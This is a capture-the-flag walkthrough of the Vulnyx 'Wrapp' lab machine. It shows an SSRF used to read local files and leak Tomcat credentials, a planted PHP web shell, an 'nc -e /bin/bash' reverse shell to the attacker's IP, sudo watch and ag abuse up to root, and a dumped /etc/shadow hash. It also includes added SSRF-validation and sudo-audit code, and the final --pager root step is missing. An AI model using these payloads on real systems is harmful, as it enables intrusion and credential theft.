Vulnyx-Wrapp-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.215 08:00:27:0b:12:8a PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.096 seconds (122.14 hosts/sec). 4 responded
export ip=192.168.60.215
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.215:22
Open 192.168.60.215:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-27 20:54 CST
Initiating ARP Ping Scan at 20:54
Scanning 192.168.60.215 [1 port]
Completed ARP Ping Scan at 20:54, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:54
Completed Parallel DNS resolution of 1 host. at 20:54, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:54
Scanning 192.168.60.215 [2 ports]
Discovered open port 22/tcp on 192.168.60.215
Discovered open port 80/tcp on 192.168.60.215
Completed SYN Stealth Scan at 20:54, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.215
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-02-27 20:54:14 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:0B:12:8A (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Scan for directories

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.215
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 20]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.215/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.60.215/advanced-search/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

SSRF

/advanced-search has a "private search" feature that lets you specify a URL to go to.

The target host makes the request itself and then displays the returned content on the page.

❯ curl http://192.168.60.215/advanced-search/path.php\?path\=192.168.60.100
tail -f /var/log/nginx/access.log
192.168.60.215 - - [27/Feb/2025:20:58:53 +0800] "GET / HTTP/1.1" 200 1859 "-" "-"

But it does not parse PHP; the response is only treated as plain text.

I tried requesting ports on the internal address

to see whether any services are open only locally.

Fuzz it, using the range module to iterate over all ports.

Port 65000 is found open locally.

❯ wfuzz -c -u "http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:FUZZ"  -z range,1-65535 --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:FUZZ
Total requests: 65535

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000022: 200 2 L 4 W 60 Ch "22"
000000080: 200 1 L 2 W 20 Ch "80"
000065000: 200 29 L 211 W 1895 Ch "65000"

curl it to see what it is: it turns out to be Tomcat.

The bottom of the page also notes that users are defined in /etc/tomcat9/tomcat-users.xml.

❯ curl http://192.168.60.215/advanced-search/path.php\?path\=127.0.0.1:65000
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat</title>
</head>

<body>
<h1>It works !</h1>

<p>If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>

<p>This is the default Tomcat home page. It can be found on the local filesystem at: <code>/var/lib/tomcat9/webapps/ROOT/index.html</code></p>

<p>Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with <code>CATALINA_HOME</code> in <code>/usr/share/tomcat9</code> and <code>CATALINA_BASE</code> in <code>/var/lib/tomcat9</code>, following the rules from <code>/usr/share/doc/tomcat9-common/RUNNING.txt.gz</code>.</p>

<p>You might consider installing the following packages, if you haven't already done so:</p>

<p><b>tomcat9-docs</b>: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking <a href="docs/">here</a>.</p>

<p><b>tomcat9-examples</b>: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking <a href="examples/">here</a>.</p>

<p><b>tomcat9-admin</b>: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the <a href="manager/html">manager webapp</a> and the <a href="host-manager/html">host-manager webapp</a>.</p>

<p>NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in <code>/etc/tomcat9/tomcat-users.xml</code>.</p>

</body>
</html>

Fuzz again to see which directories exist on port 65000.

A manager directory is found.

❯ wfuzz -c -u "http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:65000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 48
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.215/advanced-search/path.php?path=127.0.0.1:65000/FUZZ
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000004575: 200 0 L 0 W 0 Ch "manager"

Total time: 123.0121
Processed Requests: 10644
Filtered Requests: 10628
Requests/sec.: 86.52805

I guessed there might be an LFI vulnerability.

Fuzzed again.

There is none; Tomcat errors out as soon as a space appears in the path.

Back in the earlier path parameter, I kept trying to find a way to read local files rather than exposed web pages.

The file:// scheme can be used to read local files.

Reading /etc/passwd gives the users edward and henry.

❯ curl http://192.168.60.215/advanced-search/path.php\?path\=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
tomcat:x:998:998:Apache Tomcat:/:/usr/sbin/nologin

Read Tomcat's user configuration file.

This gives the credentials edward:3dw4RdP4zZzZzZw0rD.

❯ curl http://192.168.60.215/advanced-search/path.php\?path\=file:///etc/tomcat9/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<user username="edward" password="3dw4RdP4zZzZzZw0rD" roles="manager-gui"/>
</tomcat-users>
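The three inputs above (a bare internal IP, 127.0.0.1:&lt;port&gt; for the port sweep, and file:///etc/passwd) all get through because path.php fetches whatever it is given. As an added example, not the box's own path.php, this is the allow-list a fetch proxy should apply before requesting a user-supplied target; the allowed schemes and ports are assumptions for illustration.

```python
# Added example (not from the walkthrough): validate an SSRF-prone "path" parameter.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # rejects file:///etc/passwd and scheme-less input
ALLOWED_PORTS = {80, 443}            # rejects the 127.0.0.1:FUZZ port sweep outright


def resolve(host):
    """Return the addresses for host; IP literals pass through without a DNS lookup."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def validate_fetch_target(raw, resolver=resolve):
    """Return (ok, reason). Fetch only when ok is True; re-run this on every redirect hop."""
    parts = urlsplit(raw.strip())
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    for addr in resolver(parts.hostname):
        ip = ipaddress.ip_address(addr)
        # loopback (the Tomcat on 127.0.0.1:65000), RFC 1918, link-local and the
        # other reserved ranges all fail is_global, so one check covers them
        if not ip.is_global:
            return False, f"{addr} is not a public address"
    return True, "ok"
```

The fetcher must also connect to the address that was validated rather than resolving the name a second time, otherwise a DNS answer that changes between the check and the request (rebinding) bypasses the allow-list.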

User Privilege Escalation

Connect over SSH.

❯ ssh edward@$ip
The authenticity of host '192.168.60.215 (192.168.60.215)' can't be established.
ED25519 key fingerprint is SHA256:hdzcJbUQtwBTuPptVB40sb4fheVL1kIy30wCTBBU3a4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.215' (ED25519) to the list of known hosts.
edward@192.168.60.215's password:
Linux wrapp 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
edward@wrapp:~$ cat user.txt
c83fe451ef30becd77fc5ba0be044cdf

Gathering information again, the only finding is that the /var/www/html/advanced-search directory has permissions 777.

edward@wrapp:/var/www/html$ ls -al
total 16
drwxrwxrwx 3 root root 4096 abr 21 2023 .
drwxr-xr-x 3 root root 4096 jul 27 2021 ..
drwxrwxrwx 2 root root 4096 abr 21 2023 advanced-search
-rwxrwxrwx 1 root root 20 abr 21 2023 index.html

Presumably the idea is to get a www-data shell again.

Modify the file.

edward@wrapp:/var/www/html/advanced-search$ vi index.php
<?=`$_GET[0]`?>
edward@wrapp:/var/www/html/advanced-search$ curl "http://127.0.0.1/advanced-search/index.php?0=nc%20-e%20/bin/bash%20192.168.60.100%204444"

Root Privilege Escalation

Listen on the port.

Use watch to escalate to the henry user.

The henry user also has sudo rights.

❯ pwncat-cs -lp 4444
[22:00:01] Welcome to pwncat 🐈! __main__.py:164
[22:00:30] received connection from 192.168.60.215:45922 bind.py:84
[22:00:46] 192.168.60.215:45922: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@wrapp:/var/www/html/advanced-search$ sudo -l
sudo: unable to resolve host wrapp: Name or service not known
Matching Defaults entries for www-data on wrapp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on wrapp:
(henry) NOPASSWD: /usr/bin/watch
(remote) www-data@wrapp:/var/www/html/advanced-search$ sudo -u henry /usr/bin/watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo: unable to resolve host wrapp: Name or service not known
henry@wrapp:/var/www/html/advanced-search$ sudo -l
sudo: unable to resolve host wrapp: Name or service not known
Matching Defaults entries for henry on wrapp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on wrapp:
(root) NOPASSWD: /usr/bin/ag
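Both hops in this chain are visible in the two sudo -l listings above: www-data runs watch as henry, and henry runs ag as root, both NOPASSWD. As an added defender-side check (not code from the walkthrough or the box), the following parses that sudo -l text and flags rules that hand the caller another account's shell; the SHELL_CAPABLE set holds only the two binaries this box abuses and is an illustrative assumption, not a complete list.

```python
# Added example (not from the walkthrough): audit `sudo -l` output for escalation paths.
import re

# watch -x runs an arbitrary command and ag --pager runs an arbitrary pager, so a
# rule granting either lets the caller execute as the run-as user. Illustrative set.
SHELL_CAPABLE = {"/usr/bin/watch", "/usr/bin/ag"}

USER_LINE = re.compile(r"^User (\S+) may run the following commands")
RULE_LINE = re.compile(
    r"^\s*\(([^)]*)\)\s*((?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Return (user, runas_user, tags, commands) tuples from `sudo -l` output."""
    rules, user = [], None
    for line in text.splitlines():
        m = USER_LINE.match(line)
        if m:
            user = m.group(1)
            continue
        m = RULE_LINE.match(line)
        if m and user:
            runas = m.group(1).split(":")[0].strip() or "root"  # "(henry)" / "(root : root)"
            tags = {t.rstrip(":") for t in m.group(2).split()}
            commands = [c.strip() for c in m.group(3).split(",")]
            rules.append((user, runas, tags, commands))
    return rules


def audit(text):
    """Flag rules whose command can spawn a shell or helper as the run-as user."""
    findings = []
    for user, runas, tags, commands in parse_sudo_l(text):
        for cmd in commands:
            binary = cmd.split()[0]
            if binary == "ALL" or binary in SHELL_CAPABLE:
                severity = "critical" if runas in ("root", "ALL") else "high"
                findings.append({"user": user, "runas": runas, "command": cmd,
                                 "nopasswd": "NOPASSWD" in tags, "severity": severity})
    return findings


# Constructed sample: the two listings from this box, in sudo -l's own format.
SAMPLE = """\
Matching Defaults entries for www-data on wrapp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin
User www-data may run the following commands on wrapp:
    (henry) NOPASSWD: /usr/bin/watch
User henry may run the following commands on wrapp:
    (root) NOPASSWD: /usr/bin/ag
"""
```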

/usr/bin/ag can be run as root.

/usr/bin/ag is the executable of The Silver Searcher, ag for short. The Silver Searcher is a fast code search tool, similar to grep and ack but faster. It is designed for developers to quickly find matching text patterns in code bases.

So it can be used to read files.

Try reading shadow.

henry@wrapp:/var/www/html/advanced-search$ sudo /usr/bin/ag -A 10 root /etc/shadow
sudo: unable to resolve host wrapp: Name or service not known
1:root:$6$y1FOTyQcKrevvFd5$3KiZpinnULXo5m/MEItTo8.o99Ck.cN8RKA2cNClGnY/LtSSuNgIg31TUAcxZyHwh0kzm5x.UoIW7sLGly4m30:19468:0:99999:7:::
2-daemon:*:18835:0:99999:7:::
3-bin:*:18835:0:99999:7:::
4-sys:*:18835:0:99999:7:::
5-sync:*:18835:0:99999:7:::
6-games:*:18835:0:99999:7:::
7-man:*:18835:0:99999:7:::
8-lp:*:18835:0:99999:7:::
9-mail:*:18835:0:99999:7:::
10-news:*:18835:0:99999:7:::
11-uucp:*:18835:0:99999:7:::

So use a wildcard pattern to read the root flag directly.

henry@wrapp:/var/www/html/advanced-search$ sudo /usr/bin/ag  -A 10 ".*" /root/root.txt
sudo: unable to resolve host wrapp: Name or service not known
1:64e6665993d04ec49cb88ffa7e6df4eb
2-

The --pager option can be used to specify a pager program.

Commands can be executed directly here.

henry@wrapp:/var/www/html/advanced-search$ stty: 'standard input': Inappropriate ioctl for device
hostname: Name or service not known
bash: line 12: ifconfig: command not found
--------------------------------------------
# listen on the port
❯ pwncat-cs -lp 4444
(local) pwncat$
(remote) root@wrapp:/var/www/html/advanced-search# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@wrapp:/var/www/html/advanced-search# cat /root/root.txt
64e6665993d04ec49cb88ffa7e6df4eb